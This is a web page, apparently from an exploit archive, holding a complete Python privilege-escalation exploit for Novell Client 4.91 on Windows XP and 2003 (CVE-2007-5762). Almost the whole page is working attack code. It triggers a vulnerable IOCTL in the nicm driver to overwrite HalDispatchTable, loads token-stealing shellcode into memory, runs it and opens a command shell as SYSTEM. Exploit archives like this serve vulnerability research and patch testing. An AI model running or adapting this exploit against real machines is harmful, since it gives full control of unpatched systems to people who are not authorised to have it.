扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 |
# Novell Client 4.91 SP3/4 Privilege escalation exploit # Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~ # # SecurityFocus: https://www.securityfocus.com/bid/27209/info # CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762 # Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~ # # Author: sickness@offensive-security.com # Version Tested: Novell Client 4.91 SP4 # Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1) # Thanks: # - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible. # - ryujin for the help while developing the exploit. from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll= windll.ntdll Psapi= windll.Psapi def GetBase(drvname=None): EVIL_ARRAY= 1024 myarray = c_ulong * EVIL_ARRAY lpImageBase = myarray() cb= c_int(1024) lpcbNeeded= c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddr in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddr: Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[>] Retrieving %s information." % drvname print "[>] %s base address: %s" % (drvname, hex(baseaddr)) return baseaddr else: if drivername.value.lower().find("krnl") !=-1: print "[>] Retrieving Kernel information." print "[>] Kernel version: ", drivername.value print "[>] Kernel base address: %s" % hex(baseaddr) return (baseaddr, drivername.value) return None if __name__ == '__main__': usage ="%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) (krnlbase, kernelver) = GetBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase HalBase = GetBase("hal.dll") print "[>] HalDispatchTable address:", hex(HalDispatchTable) HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4 HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10 if OS == "2K3": HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003 HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003 else: HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP HalpSetSystemInformation = HalBase + 0x19436# Offset for XP print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite inut_size = 0x0 output_buffer = 0x41414141 # Junk output_size = 0x0 # Get offsets if OS == "2K3": _KPROCESS = "\x38" # Offset for 2003 _TOKEN= "\xd8" # Offset for 2003 _UPID = "\x94" # Offset for 2003 _APLINKS= "\x98" # Offset for 2003 else: _KPROCESS = "\x44" # Offset for XP _TOKEN= "\xc8" # Offset for XP _UPID = "\x84" # Offset for XP _APLINKS= "\x88" # Offset for XP # Restore the pointer pointer_restore = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) # Make the evil token stealing steal_token ="\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" # Build the shellcode sc = "\x90" * 100 sc+= pointer_restore + steal_token sc+= "\x90" * 100 if OS == "2K3": baseadd= c_int(0x02a6ba10) else: baseadd= c_int(0x026e7bb0) MEMRES = (0x1000 | 0x2000) PAGEEXE= 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write= c_int(0) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) if OS == "2K3": kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write)) else: kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) evil_in= c_ulong() evil_out= c_ulong() evil_in= 0x1337 hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out)) print "[>] Launching shell as SYSTEM." os.system("cmd.exe /K cd c:\\windows\\system32") |
体验盒子
